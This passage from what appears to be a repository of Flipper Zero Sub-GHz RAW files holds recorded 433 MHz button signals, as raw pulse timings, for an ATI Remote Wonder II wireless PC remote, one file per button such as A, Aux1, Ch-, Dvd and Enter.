-564 131 -530 67 -756 461 -196 65 -7114 197 -164 65 -368 165 -262 265 -232 97 -898 65 -6804 163 -566 99 -4546 67 -862 65 -1022 99 -962 129 -100 65 -6702 65 -100 165 -568 165 -496 99 -294 99 -164 97 -98 99 -824 65 -230 97 -7208 99 -230 97 -198 293 -5414 449 -344 67 -366 93 -684 99 -358 69 -500 101 -846 99 -326 139 -324 107 -336 95 -336 95 -832 137 -494 97 -504 97 -320 123 -336 125 -640 127 -310 135 -91800 421 -282 127 -314 127 -648 131 -326 123 -468 135 -822 131 -276 155 -310 137 -304 125 -306 125 -830 125 -490 131 -458 133 -320 143 -290 141 -614 163 -294 143 -91772 415 -172694 65 -562 163 -394 161 -724 63 -462 97 -622 97 -6806 67 -432 97 -166 199 -166 199 -1096 131 -6408 67 -398 65 -266 97 -596 99 -860 163 -234 197 -596 65 -6734 201 -396 197 -68 97 -100 133 -1026 165 -832 65 -1166 131 -398 99 -200 133 -1092 97 -1020 329 -98 229 -100 97 -856 133 -132 131 -166 99 -100 65 -164 65 -164 65 -266 99 -1728 131 -502 165 -262 165 -328 163 -492 229 -694 197 -234 165 -66 65 -330 199 -132 65 -134 197 -268 67 -7344 65 -332 97 -134 167 -132 299 -528 165 -232 129 -886 129 -956 165 -428 65 -662 99 -432 65 -434 65 -268 65 -200 133 -202 267 -202 165 -464 65 -7606 97 -624 131 -592 361 -330 331 -200 65 -564 67 -132 99 -1250 65 -496 97 -130 65 -66 163 -6898 65 -630 133 -432 197 -398 167 -794 65 -7204 99 -962 365 -732 131 -696 65 -4612 99 -496 361 -100 163 -100 163 -1380 163 -494 197 -462 361 -330 231 -1056 97 -360 429 -198 365 -266 591 -98 163 -98 297 -2452 65 -296 65 -7414 99 -166 231 -400 165 -68 65 -232 199 -198 99 -296 65 -100 129 -1648 101 -8380 65 -494 65 -366 65 -2022 165 -168 165 -598 99 -266 99 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/A.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 165 -756 361 -19708 131 -9564 65 -38016 97 -7146 131 -16218 99 -5044 299 -466 65 -5356 97 -2064 67 -10784 97 -13424 485 -282 139 -318 141 -628 139 -280 139 -454 171 -802 131 -326 143 -282 135 -300 141 -464 131 -326 143 -442 171 -590 175 -438 169 -790 131 -640 131 -288 153 -90874 413 -322 145 -288 141 -610 163 -292 177 -428 165 -782 175 -238 157 -328 145 -288 139 -446 173 -274 159 -434 175 -606 171 -426 155 -798 171 -590 169 -278 181 -90846 435 -274 175 -270 155 -630 133 -322 143 -428 157 -804 135 -300 153 -274 155 -274 183 -462 131 -324 145 -438 159 -602 159 -472 131 -804 129 -634 163 -274 155 -167204 65 -6410 97 -7032 99 -266 65 -3220 197 -496 65 -29494 67 -1028 65 -8694 65 -1060 97 -2050 65 -464 65 -662 131 -364 65 -1658 165 -200 65 -7414 65 -924 65 -6790 65 -1820 99 -6706 99 -2060 99 -16054 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Aux1.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 65 -264 65 -398 99 -1624 99 -1426 165 -1066 131 -756 361 -6628 199 -798 67 -7698 265 -330 65 -7064 65 -788 65 -1620 65 -18334 65 -6838 131 -230 129 -1148 163 -7398 133 -1258 163 -590 97 -7224 297 -1980 65 -8798 129 -66 99 -830 65 -132 67 -628 65 -262 65 -1218 163 -366 163 -234 101 -134 65 -100 133 -598 131 -532 65 -298 133 -364 99 -626 99 -498 463 -132 131 -100 397 -298 197 -66 267 -232 131 -6522 101 -2880 99 -1420 65 -598 65 -430 99 -234 133 -198 133 -100 65 -1912 65 -1124 97 -7008 195 -98 129 -6458 131 -11228 97 -1356 65 -824 477 -290 151 -300 137 -620 167 -272 179 -428 167 -778 175 -272 157 -276 155 -274 155 -800 171 -270 153 -460 135 -644 131 -290 151 -798 155 -804 129 -804 129 -89984 459 -262 123 -348 105 -660 139 -306 131 -478 139 -800 129 -306 125 -306 123 -328 135 -790 131 -322 141 -468 137 -622 139 -306 165 -788 141 -802 131 -798 139 -89996 427 -10916 417 -4442 65 -890 65 -374 63 -542 65 -708 65 -382 61 -868 103 -828 97 -866 63 -168506 99 -164 97 -8682 65 -296 99 -7604 97 -6628 195 -562 99 -630 133 -828 133 -7078 99 -1094 99 -1232 99 -898 131 -232 199 -1160 101 -1524 99 -1788 99 -598 99 -792 299 -234 165 -500 67 -198 133 -198 65 -7200 65 -364 65 -1026 65 -166 133 -7760 65 -300 65 -8458 65 -7836 65 -592 129 -6836 133 -7814 131 -166 163 -6624 131 -2142 65 -6756 131 -566 99 -630 97 -200 133 -1266 65 -2552 97 -2590 99 -232 135 -4812 97 -1058 99 -1918 131 -198 97 -230 97 -756 65 -2678 65 -2334 65 -2816 197 -266 99 -8160 99 -6874 65 -262 65 -1526 67 -5280 133 -596 67 -1818 97 -1850 131 -300 131 -7278 65 -5074 131 -1714 163 -134 131 -332 165 -362 97 -7102 129 -428 99 -960 199 -7206 427 -264 163 -1784 97 -886 131 -196 97 -1890 99 -132 97 -1132 165 -198 199 -232 99 -264 165 -464 99 -668 165 -1494 197 -7488 99 -7752 97 -1052 131 -7550 131 -7646 99 -1842 65 -5802 165 -198 65 -596 131 -8630 65 -854 65 -7810 65 -2584 99 -134 65 -2158 133 -1394 265 -166 65 -268 199 -464 229 -564 99 -2056 65 -988 65 -228 97 -132 131 -558 65 -1752 129 -1654 133 -9066 99 -862 97 -1878 131 -8988 163 -722 65 -8400 165 -1464 65 -830 97 -330 65 -230 97 -626 65 -2614 197 -932 97 -400 97 -432 65 -134 163 -366 65 -334 165 -334 231 -2160 65 -6358 63 -600 99 -796 99 -9142 65 -3600 133 -27666 133 -564 65 -5044 97 -234 101 -198 97 -920 65 -262 65 -8162 99 -228 63 -8874 263 -5948 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Aux3.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 165 -698 97 -590 65 -98 65 -330 65 -496 333 -98 165 -100 263 -3576 65 -3120 199 -366 65 -1296 65 -630 65 -400 99 -198 165 -200 65 -1386 99 -164 99 -326 65 -1086 163 -758 131 -1990 65 -664 65 -954 197 -1426 65 -464 65 -364 65 -200 163 -894 601 -334 199 -298 99 -266 65 -2652 133 -1062 65 -802 97 -230 67 -266 197 -1818 65 -3652 129 -130 97 -100 163 -64 97 -330 163 -164 229 -824 97 -230 63 -296 65 -1084 97 -396 65 -98 131 -332 131 -364 65 -1628 99 -728 65 -1122 65 -890 99 -462 133 -1956 99 -134 165 -2392 65 -2924 65 -1892 535 -232 233 -68 163 -300 131 -732 99 -5542 165 -494 131 -200 99 -198 99 -324 65 -798 99 -2916 165 -2868 97 -66 197 -1846 97 -130 65 -592 97 -198 195 -1088 65 -2268 65 -1022 687 -134 397 -66 133 -1194 65 -232 133 -4006 99 -2334 65 -590 165 -332 65 -2290 99 -2694 329 -926 65 -300 65 -200 97 -1460 99 -98 165 -430 331 -464 263 -66 327 -164 65 -134 131 -66 67 -66 131 -996 131 -1982 63 -1386 133 -98 133 -430 729 -132 99 -134 65 -68 329 -132 331 -100 431 -200 65 -236 131 -168 99 -98 165 -132 65 -198 133 -298 133 -166 363 -232 433 -132 231 -166 463 -100 97 -162 195 -360 131 -296 165 -296 163 -66 589 -332 131 -230 97 -130 131 -4874 65 -756 361 -690 131 -790 65 -100 129 -530 67 -2588 165 -692 131 -7640 99 -394 99 -1218 229 -298 165 -4346 67 -8900 67 -596 65 -8444 65 -264 65 -8190 65 -730 65 -560 133 -1058 165 -7920 163 -830 197 -896 131 -202 67 -4972 133 -1028 165 -2752 233 -500 165 -566 199 -860 65 -826 65 -1790 131 -994 99 -166 265 -298 295 -230 65 -1362 133 -7008 133 -592 65 -690 65 -826 67 -7606 65 -394 233 -728 65 -664 457 -316 141 -272 157 -632 133 -322 141 -466 137 -786 131 -318 141 -326 139 -276 143 -796 131 -302 177 -592 173 -280 137 -304 143 -792 165 -778 167 -756 165 -89990 411 -100858 417 -320 141 -272 153 -630 133 -310 121 -490 129 -800 123 -330 137 -298 123 -304 157 -798 139 -306 125 -630 161 -282 153 -274 155 -798 171 -756 165 -782 173 -89980 411 -10760 99 -300 99 -234 65 -766 67 -7242 65 -1162 99 -1434 201 -8832 65 -598 131 -7692 99 -566 99 -400 97 -164 131 -1132 65 -1330 265 -364 165 -464 133 -528 99 -398 165 -200 133 -794 67 -2120 131 -134 231 -166 99 -202 65 -132 65 -666 65 -432 65 -100 197 -166 165 -628 99 -500 133 -726 65 -8532 131 -498 65 -464 65 -1690 65 -7640 65 -594 65 -1580 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Aux4.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 99 -798 165 -728 197 -166 99 -1290 131 -700 199 -756 361 -198 131 -7354 197 -1330 65 -6364 261 -5200 165 -266 97 -7056 99 -1726 65 -2994 163 -196 161 -1088 65 -628 99 -6550 65 -828 133 -330 131 -296 163 -360 131 -7976 195 -830 99 -132 65 -534 65 -402 99 -8196 165 -3454 99 -468 165 -1922 163 -326 65 -296 263 -1124 65 -854 197 -798 165 -1250 397 -266 65 -162 197 -132 65 -164 131 -692 67 -6816 261 -232 99 -98 65 -560 197 -5886 97 -664 97 -68 65 -5914 131 -954 99 -198 67 -7614 131 -6548 99 -1030 165 -330 163 -3066 65 -7076 65 -398 515 -288 119 -326 141 -620 139 -304 125 -494 137 -786 133 -322 143 -270 157 -328 105 -816 131 -326 107 -652 139 -462 137 -318 141 -786 133 -790 165 -782 167 -89972 427 -4436 69 -866 65 -850 105 -828 97 -90030 417 -10926 407 -300 173 -270 153 -630 133 -322 143 -430 173 -784 129 -306 155 -274 153 -280 167 -794 165 -274 155 -632 129 -472 163 -258 153 -798 175 -778 133 -798 175 -89954 413 -350 103 -326 105 -656 131 -324 93 -502 133 -820 97 -340 125 -312 137 -302 127 -832 101 -356 105 -624 131 -482 139 -308 131 -814 133 -788 131 -812 129 -157530 65 -362 65 -166 63 -1152 99 -3588 65 -3954 131 -600 99 -198 297 -696 199 -1420 67 -6630 197 -6634 165 -592 65 -986 99 -196 229 -394 65 -428 131 -100 133 -366 67 -198 165 -2388 67 -594 67 -6418 365 -794 65 -396 97 -1720 67 -7072 165 -98 131 -164 165 -198 201 -1462 65 -3580 131 -532 131 -330 97 -460 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/B.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 65 -468 65 -1384 65 -198 131 -756 361 -7232 65 -826 65 -720 131 -29156 99 -7246 65 -4678 65 -2688 515 -290 127 -310 127 -640 131 -304 179 -426 167 -780 175 -270 127 -324 143 -290 141 -450 173 -274 165 -436 167 -624 135 -454 175 -784 133 -634 167 -424 167 -90854 419 -101222 375 -392 69 -370 65 -712 65 -354 63 -568 65 -852 65 -372 93 -366 67 -366 93 -524 67 -356 93 -502 99 -688 97 -490 125 -822 99 -676 97 -514 103 -168798 97 -9448 65 -6418 65 -930 131 -7030 65 -2040 65 -9204 163 -1384 65 -18042 99 -694 65 -1426 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/C.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 108179 -18624 795 -130 99 -394 263 -134 231 -100 133 -100 1059 -66 80203 -288 123 -318 123 -634 131 -306 125 -502 129 -808 129 -306 123 -324 135 -314 141 -290 143 -796 131 -468 135 -458 155 -474 131 -794 159 -636 129 -634 161 -90390 451 -101138 417 -318 139 -304 125 -650 131 -324 105 -470 127 -836 101 -336 125 -306 125 -306 123 -330 137 -822 99 -488 131 -492 135 -454 139 -806 131 -644 131 -652 135 -90438 427 -312 145 -292 141 -624 131 -336 105 -496 99 -814 137 -306 127 -318 141 -324 107 -344 107 -792 131 -484 141 -478 133 -474 131 -808 133 -622 139 -646 139 -119772 65 -2574 97 -300 131 -132 297 -200 597 -132 233 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Ch-.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 133 -1292 199 -2404 165 -864 331 -200 263 -932 165 -264 131 -756 361 -100 131 -6966 97 -1922 129 -698 65 -7160 65 -6460 65 -132 299 -330 65 -664 65 -2214 333 -7352 165 -398 197 -100 101 -364 67 -2220 65 -3560 65 -3058 99 -66 65 -5644 99 -132 133 -498 165 -1658 65 -698 99 -4568 65 -364 97 -7152 97 -68 97 -232 165 -722 97 -1194 65 -1262 367 -532 165 -100 165 -594 99 -494 129 -6188 97 -594 163 -494 99 -130 99 -332 65 -100 133 -232 65 -332 133 -132 65 -200 65 -766 165 -330 99 -1028 197 -462 63 -560 131 -132 97 -164 129 -294 65 -132 163 -130 425 -264 197 -366 65 -398 99 -134 165 -698 231 -266 163 -168 99 -164 299 -2858 65 -1496 99 -2496 97 -6302 99 -100 97 -434 65 -1324 65 -6634 229 -364 67 -660 67 -530 67 -232 99 -6674 97 -298 99 -722 163 -924 97 -3296 163 -1088 165 -4440 133 -7492 297 -100 131 -500 65 -230 65 -130 193 -558 97 -198 99 -64 263 -398 163 -66 99 -458 99 -4822 131 -7002 197 -68 165 -134 99 -690 99 -424 99 -196 65 -2454 65 -598 67 -1784 165 -298 131 -434 165 -230 67 -462 133 -66 395 -132 65 -922 65 -130 97 -558 131 -1118 97 -166 295 -264 131 -132 263 -230 65 -820 97 -330 297 -132 97 -396 265 -398 165 -230 65 -490 65 -328 97 -232 133 -6572 97 -658 299 -98 199 -166 99 -200 67 -264 65 -168 65 -566 99 -1464 99 -660 165 -732 97 -1298 131 -168 397 -98 99 -98 99 -362 229 -130 65 -98 165 -362 165 -66 65 -300 99 -6722 483 -318 141 -306 125 -632 133 -320 143 -464 137 -818 99 -348 105 -324 141 -298 123 -304 125 -834 137 -462 137 -454 133 -322 143 -632 133 -300 121 -492 133 -91330 453 -101168 409 -101186 419 -9768 439 -182510 97 -7950 99 -164 195 -362 99 -594 99 -592 195 -132 129 -694 97 -100 65 -1748 265 -462 99 -632 97 -432 265 -66 165 -232 755 -66 1523 -66 67 -132 199 -298 629 -232 133 -200 197 -100 263 -166 1297 -198 535 -198 995 -66 165 -66 663 -164 1027 -132 1357 -330 791 -164 163 -3052 131 -596 63 -100 65 -460 97 -558 329 -6584 129 -5298 267 -660 99 -698 165 -134 165 -400 131 -298 99 -166 99 -234 99 -1258 231 -564 163 -530 131 -1412 65 -198 365 -264 99 -164 97 -230 99 -392 363 -166 397 -266 67 -6668 165 -720 99 -496 229 -396 129 -392 131 -360 65 -132 65 -4450 97 -196 393 -430 131 -66 67 -530 263 -428 197 -162 65 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Click.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 434075000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 417 -756 361 -2706 65 -9142 65 -16292 99 -8586 131 -6770 65 -300 1651 -1284 1603 -1316 1643 -1314 1633 -1254 1661 -1222 1683 -1324 1643 -1258 1639 -796 97 -392 1657 -1294 1671 -1266 1799 -1126 1599 -4350 5651 -4600 65 -626 1657 -2690 3159 -1296 1695 -1258 1645 -1292 1627 -2732 1673 -1266 1647 -1292 1737 -1148 3131 -132 65 -2566 1653 -1274 3115 -1268 1627 -2770 1639 -1286 3105 -2758 1633 -888 133 -264 1659 -1288 1665 -1254 1625 -1316 1639 -1290 3101 -1284 1623 -2082 1685 -1290 1625 -1276 2387 -324 65 -362 69 -560 67 -370 95 -346 103 -356 69 -692 65 -882 65 -524 99 -524 65 -682 97 -678 99 -676 99 -512 103 -87552 411 -322 105 -342 97 -654 131 -326 105 -506 95 -834 139 -302 125 -306 125 -304 155 -636 139 -802 131 -494 101 -486 139 -640 137 -628 135 -654 133 -452 141 -130578 65 -236 301 -400 131 -68 99 -1604 99 -170 957 -1662 133 -68 2753 -2888 2993 -16494 67 -1690 65 -24602 65 -7302 65 -3288 131 -164 129 -1416 97 -1954 63 -994 65 -7168 99 -164 133 -7268 97 -592 165 -9230 97 -9124 65 -8212 99 -1162 65 -8034 65 -6736 99 -398 133 -200 65 -9002 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/D.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 165 -2016 65 -326 163 -262 65 -198 129 -590 65 -264 99 -266 133 -400 131 -168 65 -100 199 -164 335 -1660 65 -756 361 -232 97 -296 133 -658 65 -164 163 -494 131 -430 99 -100 163 -632 99 -234 233 -298 531 -98 133 -264 199 -100 133 -330 131 -432 65 -132 497 -628 99 -394 65 -1614 131 -1942 97 -456 65 -918 65 -6620 131 -98 163 -198 331 -232 299 -66 395 -66 165 -200 99 -98 97 -7012 65 -526 131 -630 131 -632 425 -824 65 -464 97 -756 97 -1920 195 -3406 163 -98 263 -264 97 -228 97 -396 97 -560 131 -496 67 -66 131 -164 131 -1032 165 -100 99 -402 133 -860 397 -232 131 -496 133 -330 99 -200 199 -1030 65 -7260 97 -498 65 -100 299 -498 297 -132 99 -198 197 -3548 99 -6116 131 -3774 97 -3092 63 -100 131 -264 65 -468 165 -100 101 -960 165 -266 163 -130 65 -260 131 -468 133 -700 65 -298 65 -598 165 -68 131 -132 99 -366 65 -332 99 -166 431 -100 231 -268 99 -692 65 -230 99 -564 231 -1096 67 -530 133 -98 67 -264 65 -134 65 -632 477 -288 125 -322 123 -632 163 -274 157 -470 131 -810 133 -322 141 -272 155 -292 141 -316 135 -806 129 -470 131 -478 123 -490 131 -792 171 -588 167 -782 165 -90006 423 -9030 63 -90054 427 -172192 65 -2852 67 -432 65 -100 199 -600 365 -498 97 -896 165 -402 199 -232 65 -500 131 -1390 197 -362 129 -528 131 -330 65 -66 129 -592 97 -530 697 -464 65 -794 263 -198 129 -296 97 -132 97 -132 97 -298 129 -622 231 -166 399 -496 165 -3420 99 -3814 163 -852 99 -6604 297 -628 131 -768 195 -7444 97 -1426 131 -396 197 -5890 99 -464 65 -664 65 -634 99 -132 131 -134 165 -66 229 -1186 131 -166 99 -1878 65 -4096 101 -994 99 -1392 63 -2472 167 -230 163 -98 163 -66 131 -4930 65 -298 65 -1956 65 -3660 197 -592 97 -198 129 -1184 99 -294 99 -132 133 -166 235 -764 131 -396 65 -498 99 -790 97 -560 199 -330 133 -266 197 -232 133 -734 65 -334 65 -132 99 -568 65 -232 331 -398 165 -266 97 -200 65 -468 99 -166 167 -100 67 -2054 65 -166 299 -66 133 -896 97 -98 99 -296 97 -164 131 -330 261 -98 65 -266 365 -430 363 -298 131 -1626 133 -6404 67 -266 99 -332 133 -234 231 -730 199 -530 97 -994 65 -7012 67 -166 99 -500 65 -430 165 -166 331 -168 101 -232 133 -66 65 -5810 65 -1920 131 -1064 231 -164 165 -268 399 -564 99 -622 199 -230 261 -788 131 -66 163 -526 97 -132 131 -886 231 -132 229 -264 165 -328 63 -164 131 -228 65 -262 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Doubleclick.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 434075000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 133 -1956 65 -1996 65 -1360 99 -756 361 -5802 99 -2750 97 -460 99 -27350 65 -9326 65 -6470 65 -1956 65 -2258 97 -3342 65 -6158 133 -4938 165 -534 65 -7938 65 -1810 65 -5426 67 -4770 65 -198 65 -232 65 -164 65 -820 97 -2220 99 -268 67 -858 449 -316 141 -326 139 -620 129 -296 141 -462 165 -796 137 -304 125 -326 143 -282 139 -302 141 -794 131 -480 139 -478 135 -624 175 -610 139 -628 135 -456 175 -141366 65 -7720 67 -1994 65 -26484 65 -8206 65 -2524 133 -2544 131 -764 479 -304 173 -270 151 -630 133 -322 143 -430 155 -804 133 -302 151 -274 155 -306 151 -630 141 -770 163 -452 161 -448 177 -614 139 -628 135 -620 167 -452 175 -87488 439 -324 107 -314 133 -644 129 -288 123 -502 133 -816 131 -276 155 -312 137 -302 125 -630 163 -806 133 -460 131 -458 165 -604 163 -640 129 -640 131 -476 141 -148570 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Down.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 434075000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 1105 -100 261 -66 197 -166 231 -68 301 -164 165 -98 263 -98 63 -100 795 -164 633 -100 665 -132 1625 -66 397 -66 1065 -100 131 -66 299 -68 1391 -134 731 -166 395 -100 665 -200 65 -100 197 -232 363 -68 365 -100 559 -234 133 -66 299 -134 925 -166 827 -66 267 -232 1491 -98 567 -166 1687 -66 693 -164 919 -100 989 -134 197 -100 2383 -132 1253 -66 233 -134 865 -66 631 -98 297 -134 363 -132 953 -98 627 -100 131 -66 197 -164 65 -66 995 -132 395 -132 789 -100 227 -230 65 -66 197 -98 1051 -100 661 -66 99 -100 661 -66 165 -134 859 -132 1031 -100 533 -68 397 -132 397 -134 165 -166 631 -66 629 -66 697 -66 231 -98 1319 -98 1627 -132 397 -68 533 -166 165 -66 923 -66 263 -166 691 -134 1447 -98 759 -100 665 -130 951 -132 227 -66 131 -132 165 -66 299 -198 427 -100 1061 -98 197 -98 719 -66 787 -66 427 -100 529 -100 65 -166 131 -100 629 -232 797 -98 165 -134 1025 -298 197 -66 755 -66 1619 -66 299 -66 469 -98 67 -98 1193 -66 65 -66 897 -332 661 -166 331 -102 99 -166 627 -66 397 -132 367 -68 197 -68 465 -66 131 -132 335 -100 131 -100 527 -132 357 -132 1051 -166 229 -98 495 -132 131 -198 363 -130 293 -98 263 -228 163 -132 361 -66 195 -100 161 -66 723 -164 725 -100 393 -66 65 -100 165 -134 99 -302 59 -364 95 -696 61 -360 99 -522 95 -826 99 -354 93 -338 93 -346 135 -660 101 -820 97 -506 133 -490 103 -480 133 -490 131 -630 133 -490 99 -90474 427 -7794 69 -564 69 -90506 447 -288 107 -320 137 -646 129 -288 123 -502 133 -818 97 -308 155 -314 135 -304 125 -630 161 -802 129 -472 131 -478 123 -488 133 -458 167 -598 165 -462 133 -113786 163 -1396 65 -398 399 -132 267 -168 961 -134 231 -100 165 -164 265 -202 199 -168 363 -132 231 -168 199 -166 829 -298 663 -266 361 -102 399 -232 1319 -98 165 -98 293 -132 261 -164 427 -98 2637 -362 97 -98 755 -132 197 -66 129 -262 199 -66 231 -200 1187 -130 229 -134 201 -100 565 -66 233 -66 167 -134 759 -166 331 -66 331 -100 165 -164 533 -132 567 -100 1657 -66 859 -298 497 -330 1187 -66 489 -196 423 -332 795 -236 1095 -66 229 -66 361 -132 429 -164 65 -132 331 -198 363 -66 363 -66 263 -328 493 -132 65 -198 97 -66 493 -164 2027 -234 823 -134 197 -100 263 -132 665 -164 131 -98 163 -166 163 -132 591 -98 99 -168 65 -102 827 -100 131 -164 821 -230 1153 -66 131 -68 329 -134 597 -100 1217 -66 855 -166 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Dvd.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 65 -1086 97 -166 63 -1180 99 -2902 65 -66 131 -1678 65 -232 65 -756 361 -7884 65 -8590 133 -7190 97 -1548 97 -7812 97 -8244 165 -6990 65 -15824 99 -1286 131 -164 65 -2334 131 -98 99 -166 97 -1820 97 -1418 65 -336 133 -166 165 -7642 483 -342 101 -330 93 -682 101 -358 69 -498 127 -838 101 -332 93 -338 93 -338 125 -656 105 -834 133 -490 99 -488 139 -306 133 -812 99 -690 103 -310 135 -90452 429 -296 121 -344 95 -668 99 -338 95 -510 97 -866 97 -312 135 -334 95 -314 125 -668 97 -834 125 -494 97 -490 129 -314 123 -834 141 -636 101 -336 125 -90450 419 -310 89 -396 67 -378 69 -524 69 -868 65 -382 61 -370 93 -364 67 -690 99 -848 97 -506 97 -486 125 -328 101 -850 97 -668 99 -338 95 -90488 377 -4916 93 -878 65 -688 99 -338 103 -164264 133 -1492 99 -1760 99 -338 65 -6900 131 -1030 65 -7818 67 -762 99 -3778 97 -1878 97 -17468 99 -862 63 -6680 167 -2652 99 -294 97 -528 361 -66 65 -332 131 -298 99 -932 131 -232 767 -66 165 -100 1193 -66 395 -164 195 -98 229 -166 131 -200 429 -166 99 -232 231 -166 231 -100 197 -300 231 -98 359 -494 425 -790 131 -166 97 -432 129 -398 463 -364 657 -230 131 -66 129 -230 165 -8234 65 -732 167 -4710 133 -7326 131 -526 133 -198 67 -364 65 -7636 65 -8114 65 -3204 65 -558 99 -8532 65 -5530 65 -1088 65 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/E.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 434176948 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 1501 -100 1543 -98 1587 -132 331 -164 819 -98 663 -66 829 -100 1057 -134 2255 -100 99 -100 3185 -100 1349 -166 953 -66 1755 -66 4019 -202 627 -232 331 -232 265 -98 165 -134 163 -230 399 -66 393 -98 97 -230 1217 -98 1881 -100 425 -132 433 -132 3449 -100 859 -132 1229 -66 1615 -66 129 -98 1649 -98 263 -98 327 -296 823 -66 2841 -66 1755 -98 891 -100 3147 -100 2607 -100 531 -98 3271 -100 919 -166 1597 -66 4741 -100 1091 -68 661 -66 199 -66 1963 -66 14885 -66 333 -66 3557 -66 397 -66 235 -66 661 -66 1791 -66 2221 -100 2579 -198 1827 -66 531 -198 2989 -68 299 -66 1841 -68 861 -98 1149 -164 5891 -100 4997 -290 153 -290 181 -582 171 -268 157 -466 135 -810 135 -286 179 -270 155 -292 181 -248 169 -766 191 -404 195 -410 209 -416 171 -756 195 -770 161 -244 181 -90400 541 -222 151 -304 125 -632 163 -274 153 -472 131 -796 137 -312 167 -270 177 -290 143 -272 157 -796 125 -472 163 -440 171 -438 159 -766 171 -794 131 -306 153 -90410 455 -332 63 -1160 67 -368 65 -548 67 -890 105 -338 65 -382 69 -386 67 -856 67 -522 99 -520 67 -518 139 -806 131 -804 105 -340 133 -90414 491 -268 127 -322 125 -664 99 -338 93 -502 131 -808 129 -308 123 -328 133 -310 139 -326 105 -806 131 -494 101 -502 133 -460 127 -802 169 -754 163 -276 153 -90444 451 -298 123 -336 93 -670 97 -340 125 -492 97 -868 67 -340 101 -352 93 -338 123 -312 135 -828 97 -502 99 -494 127 -508 97 -804 133 -824 129 -288 125 -101678 991 -66 329 -100 65 -132 99 -200 265 -98 2873 -66 1397 -100 1651 -98 7499 -100 667 -98 2057 -100 999 -100 2081 -66 6201 -100 6043 -132 65 -66 1257 -98 5219 -66 5295 -66 1031 -100 1059 -66 1325 -100 1487 -100 3151 -68 2485 -266 363 -66 201 -198 4987 -66 2709 -102 597 -364 5385 -164 655 -68 1193 -66 397 -66 2697 -132 3067 -100 1827 -132 729 -134 97 -98 1693 -68 595 -68 565 -98 861 -132 1815 -100 563 -66 1659 -234 2115 -64 819 -100 165 -66 1825 -98 13177 -66 1415 -132 231 -134 297 -132 1919 -66 361 -98 1379 -66 985 -132 1317 -66 395 -100 763 -98 1021 -132 1325 -66 2677 -64 2083 -100 1225 -134 531 -100 525 -98 725 -98 2087 -132 165 -132 231 -398 1031 -132 97 -164 331 -66 2069 -66 933 -98 301 -100 3651 -132 97 -130 955 -66 3709 -100 199 -68 1751 -66 593 -230 889 -98 691 -66 1065 -66 229 -66 1641 -98 1709 -98 1115 -66 3301 -66 1057 -98 595 -134 961 -66 1497 -66 927 -234 397 -68 763 -66 1791 -66 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Enter.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 263 -1922 99 -632 197 -366 99 -2026 231 -232 199 -328 99 -196 131 -298 97 -196 363 -166 99 -1082 97 -166 131 -756 361 -362 131 -132 231 -264 401 -1728 97 -166 99 -66 131 -100 165 -164 67 -796 133 -100 97 -98 261 